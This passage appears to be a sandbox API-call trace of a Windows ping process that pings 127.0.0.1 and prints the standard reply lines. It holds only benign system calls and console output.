lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0081.218] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xa77b00 [0081.218] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xa77b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0081.218] _fileno (_File=0x76ea4c28) returned 1 [0081.218] _write (in: _FileHandle=1, _Buf=0xa77b00*, _MaxCharCount=0x14 | out: _Buf=0xa77b00*) returned 20 [0081.218] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.218] _fileno (_File=0x76ea4c28) returned 1 [0081.218] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0081.218] LocalFree (hMem=0xa77b00) returned 0x0 [0081.218] LocalFree (hMem=0xa77ac8) returned 0x0 [0081.218] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="竈§勤p▪\x94䰨盪❚") returned 0x18 [0081.218] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.218] _fileno (_File=0x76ea4c28) returned 1 [0081.218] _get_osfhandle (_FileHandle=1) returned 0x28 [0081.218] GetFileType (hFile=0x28) returned 0x2 [0081.218] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0081.218] GetLastError () returned 0x6 [0081.218] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p❚") returned 0x0 [0081.218] _fileno (_File=0x76ea4c28) returned 1 [0081.218] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0081.218] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0081.218] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xa6c318 [0081.218] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xa6c318, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0081.218] _fileno (_File=0x76ea4c28) returned 1 [0081.218] _write (in: _FileHandle=1, _Buf=0xa6c318*, _MaxCharCount=0x18 | out: _Buf=0xa6c318*) returned 24 [0081.218] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.218] _fileno (_File=0x76ea4c28) returned 1 [0081.218] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0081.218] LocalFree (hMem=0xa6c318) returned 0x0 [0081.218] LocalFree (hMem=0xa77ac8) returned 0x0 [0081.218] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0081.218] IcmpSendEcho2Ex (in: IcmpHandle=0xa66bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa6c3e0, RequestSize=0x20, RequestOptions=0x70f0dc, ReplyBuffer=0xa75270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa75270) returned 0x1 [0081.219] InetNtopW (in: Family=2, pAddr=0x70f0cc, pStringBuf=0x70f1f4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0081.219] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="笈§勤p⛔\x94䰨盪✣") returned 0x16 [0081.219] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.219] _fileno (_File=0x76ea4c28) returned 1 [0081.219] _get_osfhandle (_FileHandle=1) returned 0x28 [0081.219] GetFileType (hFile=0x28) returned 0x2 [0081.219] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0081.219] GetLastError () returned 0x6 [0081.219] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p✣") returned 0x0 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0081.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0081.220] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa77b40 [0081.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa77b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _write (in: _FileHandle=1, _Buf=0xa77b40*, _MaxCharCount=0x16 | out: _Buf=0xa77b40*) returned 22 [0081.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0081.220] LocalFree (hMem=0xa77b40) returned 0x0 [0081.220] LocalFree (hMem=0xa77b08) returned 0x0 [0081.220] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="笈§勤p⛿\x94䰨盪✼") returned 0x9 [0081.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _get_osfhandle (_FileHandle=1) returned 0x28 [0081.220] GetFileType (hFile=0x28) returned 0x2 [0081.220] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0081.220] GetLastError () returned 0x6 [0081.220] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p✼") returned 0x0 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0081.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.220] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa68a90 [0081.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa68a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _write (in: _FileHandle=1, _Buf=0xa68a90*, _MaxCharCount=0x9 | out: _Buf=0xa68a90*) returned 9 [0081.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0081.220] LocalFree (hMem=0xa68a90) returned 0x0 [0081.220] LocalFree (hMem=0xa77b08) returned 0x0 [0081.220] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x70f064, nSize=0x0, Arguments=0x70f060 | out: lpBuffer="笈§勤p➷\x94䰨盪✧") returned 0x9 [0081.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _get_osfhandle (_FileHandle=1) returned 0x28 [0081.220] GetFileType (hFile=0x28) returned 0x2 [0081.220] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f028 | out: lpMode=0x70f028) returned 0 [0081.220] GetLastError () returned 0x6 [0081.220] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef8c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0081.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.220] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa68a90 [0081.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa68a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _write (in: _FileHandle=1, _Buf=0xa68a90*, _MaxCharCount=0x9 | out: _Buf=0xa68a90*) returned 9 [0081.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.220] _fileno (_File=0x76ea4c28) returned 1 [0081.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0081.220] LocalFree (hMem=0xa68a90) returned 0x0 [0081.221] LocalFree (hMem=0xa77b08) returned 0x0 [0081.221] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="笈§勤p⟘\x94䰨盪✨") returned 0x9 [0081.221] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.221] _fileno (_File=0x76ea4c28) returned 1 [0081.221] _get_osfhandle (_FileHandle=1) returned 0x28 [0081.221] GetFileType (hFile=0x28) returned 0x2 [0081.221] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0081.221] GetLastError () returned 0x6 [0081.221] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p✨") returned 0x0 [0081.221] _fileno (_File=0x76ea4c28) returned 1 [0081.221] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0081.221] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.221] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa689a0 [0081.221] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa689a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0081.221] _fileno (_File=0x76ea4c28) returned 1 [0081.221] _write (in: _FileHandle=1, _Buf=0xa689a0*, _MaxCharCount=0x9 | out: _Buf=0xa689a0*) returned 9 [0081.221] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0081.221] _fileno (_File=0x76ea4c28) returned 1 [0081.221] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0081.221] LocalFree (hMem=0xa689a0) returned 0x0 [0081.221] LocalFree (hMem=0xa77b08) returned 0x0 [0081.221] Sleep (dwMilliseconds=0x3e8) [0082.232] IcmpSendEcho2Ex (in: IcmpHandle=0xa66bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa6c3e0, RequestSize=0x20, RequestOptions=0x70f0dc, ReplyBuffer=0xa75270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa75270) returned 0x1 [0082.232] InetNtopW (in: Family=2, pAddr=0x70f0cc, pStringBuf=0x70f1f4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0082.232] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="羠§勤p⛔\x94䰨盪✣") returned 0x16 [0082.232] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0082.232] _fileno (_File=0x76ea4c28) returned 1 [0082.232] _get_osfhandle (_FileHandle=1) returned 0x28 [0082.233] GetFileType (hFile=0x28) returned 0x2 [0082.233] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0082.233] GetLastError () returned 0x6 [0082.233] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p✣") returned 0x0 [0082.233] _fileno (_File=0x76ea4c28) returned 1 [0082.233] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0082.233] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0082.233] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa77fd8 [0082.233] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa77fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0082.233] _fileno (_File=0x76ea4c28) returned 1 [0082.233] _write (in: _FileHandle=1, _Buf=0xa77fd8*, _MaxCharCount=0x16 | out: _Buf=0xa77fd8*) returned 22 [0082.233] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0082.233] _fileno (_File=0x76ea4c28) returned 1 [0082.233] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0082.233] LocalFree (hMem=0xa77fd8) returned 0x0 [0082.233] LocalFree (hMem=0xa77fa0) returned 0x0 [0082.233] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="羠§勤p⛿\x94䰨盪✼") returned 0x9 [0082.233] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0082.233] _fileno (_File=0x76ea4c28) returned 1 [0082.233] _get_osfhandle (_FileHandle=1) returned 0x28 [0082.233] GetFileType (hFile=0x28) returned 0x2 [0082.233] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0082.233] GetLastError () returned 0x6 [0082.233] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p✼") returned 0x0 [0082.233] _fileno (_File=0x76ea4c28) returned 1 [0082.233] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0082.233] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.233] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa689a0 [0082.233] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa689a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0082.233] _fileno (_File=0x76ea4c28) returned 1 [0082.233] _write (in: _FileHandle=1, _Buf=0xa689a0*, _MaxCharCount=0x9 | out: _Buf=0xa689a0*) returned 9 [0082.233] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0082.233] _fileno (_File=0x76ea4c28) returned 1 [0082.233] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0082.233] LocalFree (hMem=0xa689a0) returned 0x0 [0082.233] LocalFree (hMem=0xa77fa0) returned 0x0 [0082.233] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x70f064, nSize=0x0, Arguments=0x70f060 | out: lpBuffer="羠§勤p➷\x94䰨盪✧") returned 0x9 [0082.233] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0082.233] _fileno (_File=0x76ea4c28) returned 1 [0082.233] _get_osfhandle (_FileHandle=1) returned 0x28 [0082.234] GetFileType (hFile=0x28) returned 0x2 [0082.234] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f028 | out: lpMode=0x70f028) returned 0 [0082.234] GetLastError () returned 0x6 [0082.234] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef8c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0082.234] _fileno (_File=0x76ea4c28) returned 1 [0082.234] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0082.234] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.234] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa68a90 [0082.234] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa68a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0082.234] _fileno (_File=0x76ea4c28) returned 1 [0082.234] _write (in: _FileHandle=1, _Buf=0xa68a90*, _MaxCharCount=0x9 | out: _Buf=0xa68a90*) returned 9 [0082.234] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0082.234] _fileno (_File=0x76ea4c28) returned 1 [0082.234] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0082.234] LocalFree (hMem=0xa68a90) returned 0x0 [0082.234] LocalFree (hMem=0xa77fa0) returned 0x0 [0082.234] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="羠§勤p⟘\x94䰨盪✨") returned 0x9 [0082.234] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0082.234] _fileno (_File=0x76ea4c28) returned 1 [0082.234] _get_osfhandle (_FileHandle=1) returned 0x28 [0082.234] GetFileType (hFile=0x28) returned 0x2 [0082.234] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0082.234] GetLastError () returned 0x6 [0082.234] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p✨") returned 0x0 [0082.234] _fileno (_File=0x76ea4c28) returned 1 [0082.234] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0082.234] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.234] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa689a0 [0082.234] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa689a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0082.234] _fileno (_File=0x76ea4c28) returned 1 [0082.234] _write (in: _FileHandle=1, _Buf=0xa689a0*, _MaxCharCount=0x9 | out: _Buf=0xa689a0*) returned 9 [0082.234] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0082.234] _fileno (_File=0x76ea4c28) returned 1 [0082.234] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0082.234] LocalFree (hMem=0xa689a0) returned 0x0 [0082.234] LocalFree (hMem=0xa77fa0) returned 0x0 [0082.234] Sleep (dwMilliseconds=0x3e8) [0083.247] IcmpSendEcho2Ex (in: IcmpHandle=0xa66bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa6c3e0, RequestSize=0x20, RequestOptions=0x70f0dc, ReplyBuffer=0xa75270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa75270) returned 0x1 [0083.248] InetNtopW (in: Family=2, pAddr=0x70f0cc, pStringBuf=0x70f1f4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0083.248] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="羠§勤p⛔\x94䰨盪✣") returned 0x16 [0083.248] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.248] _fileno (_File=0x76ea4c28) returned 1 [0083.248] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.248] GetFileType (hFile=0x28) returned 0x2 [0083.248] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0083.248] GetLastError () returned 0x6 [0083.248] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p✣") returned 0x0 [0083.248] _fileno (_File=0x76ea4c28) returned 1 [0083.248] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.248] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0083.248] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa77fd8 [0083.248] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa77fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0083.248] _fileno (_File=0x76ea4c28) returned 1 [0083.248] _write (in: _FileHandle=1, _Buf=0xa77fd8*, _MaxCharCount=0x16 | out: _Buf=0xa77fd8*) returned 22 [0083.248] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.248] _fileno (_File=0x76ea4c28) returned 1 [0083.248] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.248] LocalFree (hMem=0xa77fd8) returned 0x0 [0083.248] LocalFree (hMem=0xa77fa0) returned 0x0 [0083.248] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="羠§勤p⛿\x94䰨盪✼") returned 0x9 [0083.248] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.248] _fileno (_File=0x76ea4c28) returned 1 [0083.248] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.248] GetFileType (hFile=0x28) returned 0x2 [0083.248] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0083.248] GetLastError () returned 0x6 [0083.248] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p✼") returned 0x0 [0083.248] _fileno (_File=0x76ea4c28) returned 1 [0083.249] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.249] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.249] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa689b8 [0083.249] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa689b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0083.249] _fileno (_File=0x76ea4c28) returned 1 [0083.249] _write (in: _FileHandle=1, _Buf=0xa689b8*, _MaxCharCount=0x9 | out: _Buf=0xa689b8*) returned 9 [0083.249] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.249] _fileno (_File=0x76ea4c28) returned 1 [0083.249] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.249] LocalFree (hMem=0xa689b8) returned 0x0 [0083.249] LocalFree (hMem=0xa77fa0) returned 0x0 [0083.249] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x70f064, nSize=0x0, Arguments=0x70f060 | out: lpBuffer="羠§勤p➷\x94䰨盪✧") returned 0x9 [0083.249] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.249] _fileno (_File=0x76ea4c28) returned 1 [0083.249] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.249] GetFileType (hFile=0x28) returned 0x2 [0083.249] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f028 | out: lpMode=0x70f028) returned 0 [0083.249] GetLastError () returned 0x6 [0083.249] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef8c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0083.249] _fileno (_File=0x76ea4c28) returned 1 [0083.249] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.249] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.249] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa689b8 [0083.249] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa689b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0083.249] _fileno (_File=0x76ea4c28) returned 1 [0083.249] _write (in: _FileHandle=1, _Buf=0xa689b8*, _MaxCharCount=0x9 | out: _Buf=0xa689b8*) returned 9 [0083.249] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.249] _fileno (_File=0x76ea4c28) returned 1 [0083.249] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.249] LocalFree (hMem=0xa689b8) returned 0x0 [0083.249] LocalFree (hMem=0xa77fa0) returned 0x0 [0083.249] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x70f060, nSize=0x0, Arguments=0x70f05c | out: lpBuffer="羠§勤p⟘\x94䰨盪✨") returned 0x9 [0083.249] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.249] _fileno (_File=0x76ea4c28) returned 1 [0083.249] 